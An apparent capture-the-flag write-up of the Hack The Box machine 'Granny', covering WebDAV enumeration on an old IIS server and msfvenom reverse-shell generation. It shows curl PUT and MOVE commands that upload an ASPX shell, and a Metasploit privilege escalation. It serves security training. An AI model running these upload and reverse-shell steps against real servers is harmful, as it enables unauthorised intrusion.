I"L<h1 id="introductiongranny">Introduction@Granny:~$</h1>

<table>
  <thead>
    <tr>
      <th>Column</th>
      <th>Details</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Name</td>
      <td>Granny</td>
    </tr>
    <tr>
      <td>IP</td>
      <td>10.10.10.15</td>
    </tr>
    <tr>
      <td>Points</td>
      <td>20</td>
    </tr>
    <tr>
      <td>Os</td>
      <td>Windows</td>
    </tr>
    <tr>
      <td>Difficult</td>
      <td>Low</td>
    </tr>
    <tr>
      <td>Creator</td>
      <td><a href="https://www.hackthebox.eu/home/users/profile/1">cha4p</a></td>
    </tr>
    <tr>
      <td>Out on</td>
      <td>12th April 2017</td>
    </tr>
  </tbody>
</table>

<h1 id="summary">Summary:~$</h1>

<ul>
  <li>Discovering the new host and scanning for open ports.</li>
  <li><code class="language-plaintext highlighter-rouge">PUT,MOVE</code> were on of the HTTP Methods allowed.</li>
  <li>Outdated version of IIS is running which allowed code execution by <code class="language-plaintext highlighter-rouge">PUT</code> and <code class="language-plaintext highlighter-rouge">MOVE</code> commands</li>
  <li>Got <code class="language-plaintext highlighter-rouge">Root</code> using <code class="language-plaintext highlighter-rouge">local-exploit-suggester</code> on metasploit.</li>
</ul>

<h1 id="starting">Starting:~$</h1>

<h2 id="nmap">Nmap</h2>

<p>I have used <strong>nmapAutomator</strong> , which keeps the scanning fast and reduces effort.<em>(Not recommended in real life scenarios).</em></p>

<p>Dowload link: <a href="https://github.com/21y4d/nmapAutomator">nmapAutomator</a></p>

<hr />
<p><img src="/assets/img/granny-hackthebox/nmap-automator-1.png" alt="" /></p>

<p>Let’s access <code class="language-plaintext highlighter-rouge">Port 80</code>.</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/port-80-2.png" alt="" /></p>

<p>I straight jumped to what I saw i.e. the <code class="language-plaintext highlighter-rouge">HTTP Methods allowed</code>, in which <em>PUT</em> and <em>MOVE</em> were one of them.</p>

<p>Using <code class="language-plaintext highlighter-rouge">davtest</code> to check the extensions which can be uploaded.</p>

<p><strong>Command</strong>: <em>davtest -url http://10.10.10.15</em></p>

<hr />
<p><img src="/assets/img/granny-hackthebox/davtest-command-4.png" alt="" /></p>

<p>It doesn’t allow <code class="language-plaintext highlighter-rouge">aspx</code> and <code class="language-plaintext highlighter-rouge">asp</code> but allows <code class="language-plaintext highlighter-rouge">txt</code>.</p>

<p>So I thought to create a msfvenom shell with <code class="language-plaintext highlighter-rouge">aspx</code> extension and rename it to <code class="language-plaintext highlighter-rouge">txt</code> extension while sending it to the server via <code class="language-plaintext highlighter-rouge">PUT</code> command and again renaming it to <code class="language-plaintext highlighter-rouge">aspx</code> extension by using <code class="language-plaintext highlighter-rouge">MOVE</code> command.</p>

<p><strong>msfvenom command</strong>: <em>msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.X.X LPORT=1234 -o shell.aspx</em></p>

<p><strong>renaming command</strong>: <em>mv shell.aspx shell.txt</em></p>

<p><strong>PUT command</strong>: <em>curl -X PUT http://10.10.10.15/shell.txt –data-binary @shell.txt</em></p>

<p><strong>MOVE command</strong>: <em>curl -X MOVE –header ‘Destination:http://10.10.10.15/shell.aspx’ http://10.10.10.15/shell.txt</em></p>

<hr />
<p><img src="/assets/img/granny-hackthebox/msfvenom-commands-2.png" alt="" /></p>

<p>Accessing <code class="language-plaintext highlighter-rouge">http://10.10.10.15/shell.aspx</code> and listening on <code class="language-plaintext highlighter-rouge">multi/handler</code> on metasploit.</p>

<p><strong>Metasploit command</strong>:</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/meterpreter-shell-1.png" alt="" /></p>

<p>Getting shell:</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/got-shell-3.png" alt="" /></p>

<p>I used <code class="language-plaintext highlighter-rouge">local_exploit_sugester</code> on metasploit to escalate the privileges.</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/exploit-suggester-4.png" alt="" /></p>

<p>I used <code class="language-plaintext highlighter-rouge">windows/local/ms15_051_client_copy_image</code>.</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/escalating-privs-5.png" alt="" /></p>

<p>Got <code class="language-plaintext highlighter-rouge">Root</code>.</p>

<hr />
<p><img src="/assets/img/granny-hackthebox/got-root-6.png" alt="" /></p>
:ET